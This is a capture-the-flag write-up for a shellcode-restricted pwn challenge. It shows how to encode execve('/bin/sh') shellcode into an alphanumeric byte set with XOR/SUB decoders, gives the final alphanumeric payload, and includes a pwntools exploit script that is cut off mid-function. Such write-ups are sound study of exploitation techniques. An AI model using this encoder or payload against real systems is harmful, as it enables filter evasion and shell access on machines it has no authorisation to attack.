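Approach
- List the usable byte set, then build up the full instruction set from it step by step
- Encode the shellcode step by step using only that set
Other players found a neat trick: instead of spawning a shell directly, hand-write a small stub that calls read, then send the real shellcode as input, which bypasses the check.
My main goal here was to learn shellcode encoding, so I reproduced the official approach instead.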
Extending the instruction set
Shellcode character set
Start with a basic shellcode:
mov rax, 0x68732f6e69622f
push rax
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
push 0x3b
pop rax
syscall
Assemble it and collect the set of byte values it needs:
{0, 5, 137, 15, 47, 49, 184, 59, 72, 80, 210, 88, 98, 231, 104, 105, 106, 110, 115, 246}
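As a cross-check, the set above can be reproduced without an assembler. The sketch below hard-codes the machine code I would expect for the listing (the hex string is my own hand-assembly, not output from the original script) and collects its distinct byte values. `ALPHABET` is the allowed set taken from the `exp()` function in the exploit.

```python
# Hand-assembled bytes for the basic shellcode (assumed encoding, one
# instruction per line; an assembler may legally choose other encodings).
SHELLCODE = bytes.fromhex(
    "48b82f62696e2f736800"  # mov rax, 0x68732f6e69622f
    "50"                    # push rax
    "4889e7"                # mov rdi, rsp
    "4831f6"                # xor rsi, rsi
    "4831d2"                # xor rdx, rdx
    "6a3b"                  # push 0x3b
    "58"                    # pop rax
    "0f05"                  # syscall
)

# Bytes the filter lets through (same string as in exp()).
ALPHABET = set(b"15aABCDEFGHIJKLMNOPQRSUVWXYZ")

needed = set(SHELLCODE)      # distinct byte values the shellcode uses
blocked = needed - ALPHABET  # values that cannot be sent as-is

if __name__ == "__main__":
    print(sorted(needed))
    print(sorted(hex(b) for b in blocked))
```

Only four of the twenty values (0x31, 0x48, 0x50, 0x58) are already in the allowed set, which is why the rest of the write-up is about manufacturing the others.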
Original instruction set
ASCII | Hex | Assembler Instruction |
---|---|---|
1 | 0x31 | xor %{32bit}, (%{64bit}) |
5 | 0x35 | xor [dword], %eax |
a | 0x61 | Bad Instruction! |
A | 0x41 | 64 bit reserved prefix |
B | 0x42 | 64 bit reserved prefix |
C | 0x43 | 64 bit reserved prefix |
D | 0x44 | 64 bit reserved prefix |
E | 0x45 | 64 bit reserved prefix |
F | 0x46 | 64 bit reserved prefix |
G | 0x47 | 64 bit reserved prefix |
H | 0x48 | 64 bit reserved prefix |
I | 0x49 | 64 bit reserved prefix |
J | 0x4a | 64 bit reserved prefix |
K | 0x4b | 64 bit reserved prefix |
L | 0x4c | 64 bit reserved prefix |
M | 0x4d | 64 bit reserved prefix |
N | 0x4e | 64 bit reserved prefix |
O | 0x4f | 64 bit reserved prefix |
P | 0x50 | push %rax |
Q | 0x51 | push %rcx |
R | 0x52 | push %rdx |
S | 0x53 | push %rbx |
U | 0x55 | push %rbp |
V | 0x56 | push %rsi |
W | 0x57 | push %rdi |
X | 0x58 | pop %rax |
Y | 0x59 | pop %rcx |
Z | 0x5a | pop %rdx |
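The usable instruction set is very limited, but it does include the data-transfer instructions push/pop and the data-modifying instructions xor %{32bit}, (%{64bit}) and xor [dword], %eax, which covers the basic needs of encoding and decoding.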
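Next, note that the current address is held in rdx, and both push %rdx and pop %rdx are usable, so we can take that address and compute offsets from it to locate the encoded shellcode. (It makes little difference in this challenge, because the memory is always mapped at 0x10000.)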
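Decoding has to modify data in memory, and the only usable opcode that can write to memory is 0x31, so we enumerate every instruction that can be formed from it: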
[001]: xor dword ptr [rcx], esi
[002]: xor dword ptr [rcx + 0x31], esp
[003]: xor dword ptr [rcx + 0x35], esp
[004]: xor dword ptr [rcx + 0x61], esp
[005]: xor dword ptr [rcx + 0x41], esp
[006]: xor dword ptr [rcx + 0x42], esp
[007]: xor dword ptr [rcx + 0x43], esp
[008]: xor dword ptr [rcx + 0x44], esp
[009]: xor dword ptr [rcx + 0x45], esp
[010]: xor dword ptr [rcx + 0x46], esp
[011]: xor dword ptr [rcx + 0x47], esp
[012]: xor dword ptr [rcx + 0x48], esp
[013]: xor dword ptr [rcx + 0x49], esp
[014]: xor dword ptr [rcx + 0x4a], esp
[015]: xor dword ptr [rcx + 0x4b], esp
[016]: xor dword ptr [rcx + 0x4c], esp
[017]: xor dword ptr [rcx + 0x4d], esp
[018]: xor dword ptr [rcx + 0x4e], esp
[019]: xor dword ptr [rcx + 0x4f], esp
[020]: xor dword ptr [rcx + 0x50], esp
[021]: xor dword ptr [rcx + 0x51], esp
[022]: xor dword ptr [rcx + 0x52], esp
[023]: xor dword ptr [rcx + 0x53], esp
[024]: xor dword ptr [rcx + 0x55], esp
[025]: xor dword ptr [rcx + 0x56], esp
[026]: xor dword ptr [rcx + 0x57], esp
[027]: xor dword ptr [rcx + 0x58], esp
[028]: xor dword ptr [rcx + 0x59], esp
[029]: xor dword ptr [rcx + 0x5a], esp
[030]: xor dword ptr [rcx + 0x31], eax
[031]: xor dword ptr [rcx + 0x35], eax
[032]: xor dword ptr [rcx + 0x61], eax
[033]: xor dword ptr [rcx + 0x41], eax
[034]: xor dword ptr [rcx + 0x42], eax
[035]: xor dword ptr [rcx + 0x43], eax
[036]: xor dword ptr [rcx + 0x44], eax
[037]: xor dword ptr [rcx + 0x45], eax
[038]: xor dword ptr [rcx + 0x46], eax
[039]: xor dword ptr [rcx + 0x47], eax
[040]: xor dword ptr [rcx + 0x48], eax
[041]: xor dword ptr [rcx + 0x49], eax
[042]: xor dword ptr [rcx + 0x4a], eax
[043]: xor dword ptr [rcx + 0x4b], eax
[044]: xor dword ptr [rcx + 0x4c], eax
[045]: xor dword ptr [rcx + 0x4d], eax
[046]: xor dword ptr [rcx + 0x4e], eax
[047]: xor dword ptr [rcx + 0x4f], eax
[048]: xor dword ptr [rcx + 0x50], eax
[049]: xor dword ptr [rcx + 0x51], eax
[050]: xor dword ptr [rcx + 0x52], eax
;... 623 more lines omitted for brevity ...
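The pattern in this listing follows from how the byte after opcode 0x31 is decoded. As a rough sketch (a hand-rolled ModRM split, not the capstone-based enumeration the exploit uses; `decode_xor_modrm` is a name made up for this example), each allowed byte can be split into its mod/reg/rm fields to see which base and source registers it selects:

```python
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
REG64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
ALPHABET = sorted(b"15aABCDEFGHIJKLMNOPQRSUVWXYZ")

def decode_xor_modrm(modrm):
    """Describe `31 <modrm>` for the simple cases.

    Returns (base_register, source_register, displacement_size_in_bytes),
    or None for forms this sketch does not handle.
    """
    mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
    if mod == 3 or rm == 4 or (mod == 0 and rm == 5):
        return None  # register form, SIB byte, or RIP-relative addressing
    disp_size = {0: 0, 1: 1, 2: 4}[mod]
    return REG64[rm], REG32[reg], disp_size

if __name__ == "__main__":
    for b in ALPHABET:
        info = decode_xor_modrm(b)
        if info:
            base, src, n = info
            disp = " + disp%d" % (8 * n) if n else ""
            print("31 %02x -> xor dword ptr [%s%s], %s" % (b, base, disp, src))
```

Among the allowed bytes, only `B` (0x42) selects an rdx base with an eax source, which is why every memory write in the final payload starts with `1B` followed by one displacement byte.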
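Plenty of instructions are available. From this list we can pick one register for reading the encoded shellcode data and one register for holding the address offset.
I use rdx to hold the address offset and eax for the decoding arithmetic (eax can be XORed with an immediate directly). The instructions involving rdx and eax are: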
[001]: xor dword ptr [rdx + 0x31], eax
[002]: xor dword ptr [rdx + 0x35], eax
[003]: xor dword ptr [rdx + 0x61], eax
[004]: xor dword ptr [rdx + 0x41], eax
[005]: xor dword ptr [rdx + 0x42], eax
[006]: xor dword ptr [rdx + 0x43], eax
[007]: xor dword ptr [rdx + 0x44], eax
[008]: xor dword ptr [rdx + 0x45], eax
[009]: xor dword ptr [rdx + 0x46], eax
[010]: xor dword ptr [rdx + 0x47], eax
[011]: xor dword ptr [rdx + 0x48], eax
[012]: xor dword ptr [rdx + 0x49], eax
[013]: xor dword ptr [rdx + 0x4a], eax
[014]: xor dword ptr [rdx + 0x4b], eax
[015]: xor dword ptr [rdx + 0x4c], eax
[016]: xor dword ptr [rdx + 0x4d], eax
[017]: xor dword ptr [rdx + 0x4e], eax
[018]: xor dword ptr [rdx + 0x4f], eax
[019]: xor dword ptr [rdx + 0x50], eax
[020]: xor dword ptr [rdx + 0x51], eax
[021]: xor dword ptr [rdx + 0x52], eax
[022]: xor dword ptr [rdx + 0x53], eax
[023]: xor dword ptr [rdx + 0x55], eax
[024]: xor dword ptr [rdx + 0x56], eax
[025]: xor dword ptr [rdx + 0x57], eax
[026]: xor dword ptr [rdx + 0x58], eax
[027]: xor dword ptr [rdx + 0x59], eax
[028]: xor dword ptr [rdx + 0x5a], eax
The disassembly here was done with capstone-engine, a very capable disassembly framework that comes with a Python interface.
Because the available displacements are fixed, we need some harmless instructions to fill the gaps. I use a push/pop rcx pair:
push %rcx
pop %rcx
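For illustration, the filler can be produced directly as bytes, since push rcx and pop rcx are the single bytes 0x51 (`Q`) and 0x59 (`Y`) from the table. The helper name `pad_with_nops` is hypothetical, and the sketch assumes that a leftover unpaired push at the end is harmless for the payload.

```python
from itertools import cycle, islice

PUSH_RCX = 0x51  # 'Q'
POP_RCX = 0x59   # 'Y'

def pad_with_nops(payload: bytes, size: int) -> bytes:
    """Append alternating push rcx / pop rcx bytes until payload is `size` long."""
    missing = max(0, size - len(payload))
    filler = bytes(islice(cycle((PUSH_RCX, POP_RCX)), missing))
    return payload + filler

if __name__ == "__main__":
    print(pad_with_nops(b"RX", 8))
```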
XOR character set
Byte values reachable with one round of XOR:
xor value:
{0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 54, 55, 56, 57, 59, 80, 84, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 107, 108, 109, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127}
Byte values reachable with two rounds of XOR. Every value up to 0x7f is now covered:
xor2 value:
{0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127}
Set difference between the shellcode character set and the XOR character set:
{231, 137, 210, 246, 184}
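These bytes need a second construction stage: among the bytes we can already reach, find instructions that can produce them, XOR-decode those instructions into place first, and then use them to decode this part of the shellcode.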
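The three sets above can be recomputed in a few lines. This is a sketch under one assumption of mine: that the "two rounds" set is the union of the alphabet, the one-round results and the two-round results, which is how `generator_set` is built in the exploit. `NEEDED` is copied from the shellcode character set listed earlier.

```python
ALPHABET = set(b"15aABCDEFGHIJKLMNOPQRSUVWXYZ")

def xor_round(left, right):
    """All values a ^ b with a taken from left and b taken from right."""
    return {a ^ b for a in left for b in right}

xor1 = xor_round(ALPHABET, ALPHABET)  # reachable as a ^ b
xor2 = xor_round(ALPHABET, xor1)      # reachable as a ^ b ^ c
reachable = ALPHABET | xor1 | xor2    # assumed meaning of "two rounds"

# Byte values of the basic shellcode, copied from the set listed earlier.
NEEDED = {0, 5, 137, 15, 47, 49, 184, 59, 72, 80, 210, 88, 98, 231,
          104, 105, 106, 110, 115, 246}
leftover = NEEDED - reachable

if __name__ == "__main__":
    print(sorted(leftover))
```

Because every allowed byte is below 0x80, XOR alone can never set the top bit, so the five leftover values are exactly the shellcode bytes above 0x7f.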
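Full character set
Following the official write-up, the second stage can use sub/add byte ptr [rxx], xl together with a few push xxxx instructions. What still puzzles me is how the official write-up arrived at this particular set of instructions.
The shellcode produced by the first decoding stage can use any byte in 0-127, and with sub/add we can in theory construct all the remaining bytes.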
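A small search shows how sub fills in the missing bytes. The sketch below is a simplified stand-in for `get_sub_lookup` from the exploit (the function name `find_sub_pair` and the sorted iteration order are my own choices): for each target it looks for a start byte and a subtrahend, both within 0x00-0x7f, whose difference modulo 256 is the target.

```python
def find_sub_pair(target, reachable):
    """Return (start, subtrahend) with (start - subtrahend) % 256 == target, or None."""
    for start in sorted(reachable):
        for sub in sorted(reachable):
            if (start - sub) % 256 == target:
                return start, sub
    return None

REACHABLE = set(range(0x80))              # result of the XOR stage
MISSING = [0x89, 0xB8, 0xD2, 0xE7, 0xF6]  # bytes XOR could not produce

if __name__ == "__main__":
    for byte in MISSING:
        start, sub = find_sub_pair(byte, REACHABLE)
        print(f"{byte:#04x} = ({start:#04x} - {sub:#04x}) mod 256")
```

One caveat the sketch exposes: with both operands limited to 0x00-0x7f, a single sub reaches 0x81-0xff but not 0x80, which would need a second sub or an add. The shellcode here never uses 0x80, so it does not matter for this challenge.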
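Encoding the shellcode
The previous step built the full character set out of xor and sub, so in theory we can now construct any instruction we like. There are two ways to encode the existing shellcode:
- Put a decoder and the encoded shellcode directly in the buffer, and have the decoder decode the encoded shellcode in place.
- Write assembly that writes the shellcode into memory.
I tried the first option first, but what I built came out too long (I'm just not good enough yet). I then switched to the second option, which is the official approach.
I use the rdx register to control where in memory to write, and the rax register for all the arithmetic.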
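First, using the instructions available in the XOR character set, build code that writes the shellcode into memory further on. The main instructions are:
push xxx
pop rax/rdx
xor dword ptr [rdx+{i*4}], eax ; writes the shellcode
sub byte ptr [rdx+{disp}], al ; produces bytes > 0x7f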
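The plan:
- Point rdx at 0x10300, which is where the shellcode will be written
- Write the shellcode
  - bytes less than or equal to 0x7f are produced with one or two XORs
  - bytes greater than 0x7f are produced with sub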
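The script is below (it does not need to be this elaborate; I wrote it this way because I wanted to experiment with building a general-purpose encoder):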
# generate code <= 0x7f
generator = b""
baseaddr = 0x10300
generator += asm(f"""
push {baseaddr}
pop rdx
""")
for i in range((len(shellcode)+3)//4):
    snippet = shellcode[i*4:(i+1)*4]
    while len(snippet) < 4:
        snippet += get_nop()
    imm = 0
    sub_queue = []
    word = b""
    for j in range(len(snippet)):
        byte = snippet[j]
        if byte not in generator_set:
            sub_operands = get_sub_byte(byte, sub_lookup)
            sub_queue.append((i*4+j, sub_operands[1]))
            byte = sub_operands[0]
        word += bytes([byte])
    imm = unpack(word, 4*8)
    generator += asm(f"""
    push {imm}
    pop rax
    xor dword ptr [rdx+{i*4}], eax
    """)
    while len(sub_queue) > 0:
        disp, imm = sub_queue.pop(0)
        generator += asm(f"""
        push {imm}
        pop rax
        sub byte ptr [rdx+{disp}], al
        """)
# avoid side effect of \x00
generator += asm("""
push rdx
pop rax
""")
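Note that the generated code is not written contiguously, and the \x00 bytes in the gaps disassemble as add byte ptr [rax], al. If rax points to a non-writable address this causes a segmentation fault, so every block of code has to end by pointing rax at a writable address.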
The assembly produced by this step (for the rbx variant of the shellcode used in the final exploit) is:
push 0x10300
pop rdx
push 0x622f0048
pop rax
xor dword ptr [rdx], eax
push 0x45
pop rax
sub byte ptr [rdx + 1], al
push 0x732f6e69
pop rax
xor dword ptr [rdx + 4], eax
push 0x48530068
pop rax
xor dword ptr [rdx + 8], eax
push 0x31480000
pop rax
xor dword ptr [rdx + 0xc], eax
push 0x77
pop rax
sub byte ptr [rdx + 0xc], al
push 0x19
pop rax
sub byte ptr [rdx + 0xd], al
push 0x314800
pop rax
xor dword ptr [rdx + 0x10], eax
push 0xa
pop rax
sub byte ptr [rdx + 0x10], al
push 0x2e
pop rax
sub byte ptr [rdx + 0x13], al
push 0xf583b6a
pop rax
xor dword ptr [rdx + 0x14], eax
push 0x51595105
pop rax
xor dword ptr [rdx + 0x18], eax
push rdx
pop rax
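The listing can be replayed in a small simulation to confirm that it rebuilds the shellcode. This is a sketch, not part of the original exploit: `STEPS` is transcribed by hand from the listing, `replay` is a hypothetical helper, and the target memory is assumed to start out zeroed.

```python
import struct

# (operation, displacement from rdx, value in eax/al), transcribed from the listing
STEPS = [
    ("xor", 0x00, 0x622F0048), ("sub", 0x01, 0x45),
    ("xor", 0x04, 0x732F6E69),
    ("xor", 0x08, 0x48530068),
    ("xor", 0x0C, 0x31480000), ("sub", 0x0C, 0x77), ("sub", 0x0D, 0x19),
    ("xor", 0x10, 0x00314800), ("sub", 0x10, 0x0A), ("sub", 0x13, 0x2E),
    ("xor", 0x14, 0x0F583B6A),
    ("xor", 0x18, 0x51595105),
]

def replay(steps, size=0x1C):
    """Apply the xor/sub writes to zero-filled memory and return the result."""
    mem = bytearray(size)  # assumption: the destination starts as all zeros
    for op, disp, value in steps:
        if op == "xor":    # xor dword ptr [rdx+disp], eax
            (old,) = struct.unpack_from("<I", mem, disp)
            struct.pack_into("<I", mem, disp, old ^ value)
        else:              # sub byte ptr [rdx+disp], al
            mem[disp] = (mem[disp] - value) % 256
    return bytes(mem)

if __name__ == "__main__":
    print(replay(STEPS).hex())
```

The result starts with 48 bb (mov rbx, imm64) and ends with 0f 05 (syscall) followed by three push/pop rcx filler bytes, so each sub turns a zero placeholder into one of the bytes above 0x7f.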
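The next step is to generate this code and write it into memory using only the original instruction set. The idea is the same as before. My first several attempts did not fit within 0x200 bytes; after comparing, the causes turned out to be careless handling of a few details plus some bugs:
- the multi-round XOR logic
- offset and memory-pointer updates
- bugs caused by reused variable names
The script: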
decoder = b""
# get usable disps
disps = list(get_rdx_disps(alphabet))
disps.sort()
disps = disps[3:]
# initialize rdx, rax
rdx = 0x10000
rax = rdx
distance = 0x200 - disps[0]
next_info = ptr_next(rdx, distance, xor_lookup)
decoder += next_info[1]
rdx += next_info[0]
rax = rdx
baseaddr = rdx + disps[0]
# offset = baseaddr
for i in range((len(generator)+3)//4):
    # baseaddr + i*4 == rdx + disp
    disp = baseaddr + i*4 - rdx
    if disp not in disps:
        # rdx' + disp[i] = baseaddr + i*4
        # rdx' = baseaddr + i*4 - disp[i]
        # distance = rdx' - rdx
        max_distance = baseaddr + i*4 - disps[0] - rdx
        for j in range(1, len(disps)):
            distance = baseaddr + i*4 - disps[j] - rdx
            next_info = ptr_next(rdx, distance, xor_lookup)
            if distance <= max_distance:
                decoder += next_info[1]
                rdx += next_info[0]
                rax = rdx
                disp = baseaddr + i*4 - rdx
                break
    snippet = generator[i*4:(i+1)*4]
    word = unpack_code(snippet, 4*8)
    diff = rxor(rax, word)
    xor_operands = get_xor_operands(rax, word, 4*8, xor_lookup)
    if not xor_operands:
        xor2_operands = get_xor_operands(rax, word, 4*8, xor2_lookup)
        imm = xor2_operands[0]
        decoder += asm(f"xor eax, {imm}")
        words = [b"", b""]
        for byte in pack(xor2_operands[1], 4*8):
            byte_operands = get_xor_byte(byte, xor_lookup)
            words[0] += bytes([byte_operands[0]])
            words[1] += bytes([byte_operands[1]])
        for word in words:
            imm = unpack(word, 4*8)
            decoder += asm(f"xor eax, {imm}")
    else:
        for operand in xor_operands:
            imm = operand
            decoder += asm(f"xor eax, {imm}")
    decoder += asm(f"xor dword ptr [rdx+{disp}], eax")
    rax ^= diff
# avoid side effect of \x00
distance = 0x10000 - rdx
next_info = ptr_next(rdx, distance, xor_lookup)
decoder += next_info[1]
The encoded result, which is 0x1e0 bytes once assembled:
push rdx
pop rax
xor eax, 0x31314131
xor eax, 0x31314331
push rax
pop rdx
xor eax, 0x42414131
xor eax, 0x43434359
xor dword ptr [rdx + 0x42], eax
xor eax, 0x31413141
xor eax, 0x314b3148
xor eax, 0x49615a61
xor dword ptr [rdx + 0x46], eax
xor eax, 0x41413131
xor eax, 0x514b4431
xor dword ptr [rdx + 0x4a], eax
xor eax, 0x44414c50
xor eax, 0x59496161
xor dword ptr [rdx + 0x4e], eax
xor eax, 0x31313141
xor eax, 0x31414149
xor eax, 0x44585a61
xor dword ptr [rdx + 0x52], eax
xor eax, 0x31313131
xor eax, 0x45443142
xor eax, 0x5a594143
xor dword ptr [rdx + 0x56], eax
xor eax, 0x41413131
xor eax, 0x4d44314b
xor eax, 0x615a3161
xor dword ptr [rdx + 0x5a], eax
push rdx
pop rax
xor eax, 0x31313141
xor eax, 0x3131315a
push rax
pop rdx
xor eax, 0x31414131
xor eax, 0x50494a4f
xor eax, 0x61616161
xor dword ptr [rdx + 0x43], eax
xor eax, 0x31313131
xor eax, 0x31424131
xor eax, 0x31435057
xor dword ptr [rdx + 0x47], eax
xor eax, 0x31313131
xor eax, 0x31423541
xor eax, 0x31434461
xor dword ptr [rdx + 0x4b], eax
xor eax, 0x31313131
xor eax, 0x31313531
xor eax, 0x58594442
xor dword ptr [rdx + 0x4f], eax
xor eax, 0x31313131
xor eax, 0x41415a31
xor eax, 0x424d6131
xor dword ptr [rdx + 0x53], eax
xor eax, 0x31313131
xor eax, 0x41424a31
xor eax, 0x58576146
xor dword ptr [rdx + 0x57], eax
push rdx
pop rax
xor eax, 0x31313149
xor eax, 0x31313161
push rax
pop rdx
xor eax, 0x31314131
xor eax, 0x31484841
xor eax, 0x5861614f
xor dword ptr [rdx + 0x43], eax
xor eax, 0x51414945
xor eax, 0x61556161
xor dword ptr [rdx + 0x47], eax
xor eax, 0x41313131
xor eax, 0x48415a41
xor eax, 0x614c6158
xor dword ptr [rdx + 0x4b], eax
xor eax, 0x35414131
xor eax, 0x44535931
xor eax, 0x61616158
xor dword ptr [rdx + 0x4f], eax
xor eax, 0x59425a53
xor eax, 0x61586161
xor dword ptr [rdx + 0x53], eax
xor eax, 0x41534249
xor eax, 0x47615861
xor dword ptr [rdx + 0x57], eax
push rdx
pop rax
xor eax, 0x31313131
xor eax, 0x31313149
push rax
pop rdx
xor eax, 0x31313131
xor eax, 0x43314143
xor eax, 0x61435a61
xor dword ptr [rdx + 0x43], eax
xor eax, 0x31413131
xor eax, 0x31593142
xor eax, 0x4b614243
xor dword ptr [rdx + 0x47], eax
xor eax, 0x42415331
xor eax, 0x584b6156
xor dword ptr [rdx + 0x4b], eax
xor eax, 0x41555141
xor eax, 0x5261615a
xor dword ptr [rdx + 0x4f], eax
xor eax, 0x42313131
xor eax, 0x43354131
xor eax, 0x6159494d
xor dword ptr [rdx + 0x53], eax
xor eax, 0x41313131
xor eax, 0x495a314b
xor eax, 0x61614961
xor dword ptr [rdx + 0x57], eax
push rdx
pop rax
xor eax, 0x31314131
xor eax, 0x31314361
push rax
pop rdx
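Every `xor eax, imm` pair in the listing comes from splitting a 32-bit difference byte by byte into two immediates made only of allowed bytes. The sketch below re-implements that idea with the standard library only. `build_xor_lookup` and `split_xor` are simplified stand-ins for `get_xor_lookup` and `get_xor_operands` in the exploit, and iterating the alphabet in sorted order is my own choice to make the output deterministic.

```python
import struct

ALPHABET = sorted(b"15aABCDEFGHIJKLMNOPQRSUVWXYZ")

def build_xor_lookup(alphabet):
    """Map each value a ^ b to the first (a, b) pair of alphabet bytes that produces it."""
    lookup = {}
    for a in alphabet:
        for b in alphabet:
            lookup.setdefault(a ^ b, (a, b))
    return lookup

def split_xor(diff, lookup):
    """Split a 32-bit diff into two immediates whose bytes all come from the alphabet."""
    first, second = bytearray(), bytearray()
    for byte in struct.pack("<I", diff):
        pair = lookup.get(byte)
        if pair is None:
            return None  # this byte needs a third xor or a different target
        first.append(pair[0])
        second.append(pair[1])
    return struct.unpack("<I", first)[0], struct.unpack("<I", second)[0]

if __name__ == "__main__":
    lookup = build_xor_lookup(ALPHABET)
    # Moving eax from 0x10000 to 0x10200 means XORing in the difference 0x200.
    a, b = split_xor(0x10000 ^ 0x10200, lookup)
    print(hex(a), hex(b))
```

With this iteration order the difference 0x200 splits into 0x31314131 and 0x31314331, the same pair that opens the listing. When a byte of the difference is not in the one-round table, the exploit falls back to three immediates, which is where the three-instruction groups come from.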
Finally, pad with nop instructions up to 0x200. The final payload:
RX51A1151C11PZ51AAB5YCCC1BB5A1A15H1K15aZaI1BF511AA51DKQ1BJ5PLAD5aaIY1BN5A1115IAA15aZXD1BR511115B1DE5CAYZ1BV511AA5K1DM5a1Za1BZRX5A1115Z111PZ51AA15OJIP5aaaa1BC5111151AB15WPC11BG511115A5B15aDC11BK51111515115BDYX1BO5111151ZAA51aMB1BS5111151JBA5FaWX1BWRX5I1115a111PZ51A115AHH15OaaX1BC5EIAQ5aaUa1BG5111A5AZAH5XaLa1BK51AA551YSD5Xaaa1BO5SZBY5aaXa1BS5IBSA5aXaG1BWRX511115I111PZ511115CA1C5aZCa1BC511A15B1Y15CBaK1BG51SAB5VaKX1BK5AQUA5ZaaR1BO5111B51A5C5MIYa1BS5111A5K1ZI5aIaa1BWRX51A115aC11PZYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQYQ
Exp
from pwn import *
from capstone import *
from capstone import x86
from keystone import *
debug = False
local_path = './pwn_1'
remote_path = 'node4.buuoj.cn'
remote_port = 29298
file = ELF(local_path)
libc = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6')
# libc = file.libc
# ld = ELF('/usr/lib/x86_64-linux-gnu/ld-2.31.so')
context.binary = local_path
if debug:
    io = process(local_path)
    # context.terminal = ['cmd.exe', '/c', 'wt.exe', '-w', '0','sp', '-V', '--title', 'gdb', 'bash', '-c']
    # context.terminal = ['cmd.exe', '/c', 'wt.exe', 'bash', '-c']
    context.log_level = 'debug'
else:
    io = remote(remote_path, remote_port)
def z(a=''):
    if debug:
        gdb.attach(io, a)
        if a == '':
            raw_input()
    else:
        pass
def asm(code):
    ks = Ks(KS_ARCH_X86, KS_MODE_64)
    encoding, count = ks.asm(code)
    return bytes(encoding)
def disasm(code):
    md = Cs(CS_ARCH_X86, CS_MODE_64)
    md.detail = True
    return md.disasm(code, 0x0)
def rxor(src, dest):
    return src ^ dest
def unpack_code(code, word_size):
    nop_count = word_size//8 - len(code)
    for i in range(nop_count):
        code += get_nop()
    return unpack(code, word_size)
def get_xor_lookup(alphabet1, alphabet2=None):
    if alphabet2 is None:
        alphabet2 = alphabet1
    lookup = dict()
    for i in alphabet1:
        for j in alphabet2:
            k = i ^ j
            if lookup.get(k):
                continue
            else:
                lookup[k] = (i, j)
    return lookup
def get_xor_byte(byte, lookup):
    return lookup.get(byte)
def get_xor_operands(src, dest, word_size, lookup):
    diff = rxor(src, dest)
    operands = [b"", b""]
    for byte in pack(diff, word_size):
        byte_operands = get_xor_byte(byte, lookup)
        if not byte_operands:
            return None
        operands[0] += bytes([byte_operands[0]])
        operands[1] += bytes([byte_operands[1]])
    return tuple([unpack(operand, word_size) for operand in operands])
def get_sub_lookup(alphabet):
    lookup = dict()
    for i in alphabet:
        for j in alphabet:
            k = (i - j) % 256
            if lookup.get(k):
                continue
            else:
                lookup[k] = (i, j)
    return lookup
def get_sub_byte(byte, lookup):
    return lookup.get(byte)
pair_flag = False
def get_nop():
    global pair_flag
    pair_flag = not pair_flag
    inst = 'push rcx' if pair_flag else 'pop rcx'
    return asm(inst)
def get_rdx_disps(alphabet):
    disps = set()
    for operand1 in alphabet:
        for operand2 in alphabet:
            code = bytes([0x31, operand1, operand2])
            for inst in disasm(code):
                if inst.mnemonic == 'xor':
                    if inst.operands[0].mem.disp not in disps:
                        if inst.reg_name(inst.operands[0].mem.base) == 'rdx' and inst.reg_name(inst.operands[1].value.reg) == 'eax':
                            disps.add(inst.operands[0].mem.disp)
                            # print("[%03d]:\t%s\t%s" %
                            # (len(disps), inst.mnemonic, inst.op_str))
    return disps
def ptr_next(ptr, distance, lookup):
    src = ptr
    dest = ptr + distance
    operands = get_xor_operands(src, dest, 4*8, lookup)
    while not operands:
        distance += 1
        dest = ptr + distance
        operands = get_xor_operands(src, dest, 4*8, lookup)
    code = f"""
    push rdx
    pop rax
    xor eax, {operands[0]}
    xor eax, {operands[1]}
    push rax
    pop rdx
    """
    return (distance, asm(code))
def encode(shellcode: str, alphabet: set):
    shellcode = asm(shellcode)
    # initialize lookup table
    xor_lookup = get_xor_lookup(alphabet)
    xor2_lookup = get_xor_lookup(alphabet, xor_lookup)
    generator_set = alphabet | set(xor_lookup) | set(xor2_lookup)
    sub_lookup = get_sub_lookup(generator_set)
    # generate code <= 0x7f
    generator = b""
    baseaddr = 0x10300
    generator += asm(f"""
    push {baseaddr}
    pop rdx
    """)
    for i in range((len(shellcode)+3)//4):
        snippet = shellcode[i*4:(i+1)*4]
        while len(snippet) < 4:
            snippet += get_nop()
        imm = 0
        sub_queue = []
        word = b""
        for j in range(len(snippet)):
            byte = snippet[j]
            if byte not in generator_set:
                sub_operands = get_sub_byte(byte, sub_lookup)
                sub_queue.append((i*4+j, sub_operands[1]))
                byte = sub_operands[0]
            word += bytes([byte])
        imm = unpack(word, 4*8)
        generator += asm(f"""
        push {imm}
        pop rax
        xor dword ptr [rdx+{i*4}], eax
        """)
        while len(sub_queue) > 0:
            disp, imm = sub_queue.pop(0)
            generator += asm(f"""
            push {imm}
            pop rax
            sub byte ptr [rdx+{disp}], al
            """)
    # avoid side effect of \x00
    generator += asm("""
    push rdx
    pop rax
    """)
    # for inst in disasm(generator):
    #     print("%s\t%s" % (inst.mnemonic, inst.op_str))
    decoder = b""
    # get usable disps
    disps = list(get_rdx_disps(alphabet))
    disps.sort()
    disps = disps[3:]
    # initialize rdx, rax
    rdx = 0x10000
    rax = rdx
    distance = 0x200 - disps[0]
    next_info = ptr_next(rdx, distance, xor_lookup)
    decoder += next_info[1]
    rdx += next_info[0]
    rax = rdx
    baseaddr = rdx + disps[0]
    # offset = baseaddr
    for i in range((len(generator)+3)//4):
        # baseaddr + i*4 == rdx + disp
        disp = baseaddr + i*4 - rdx
        if disp not in disps:
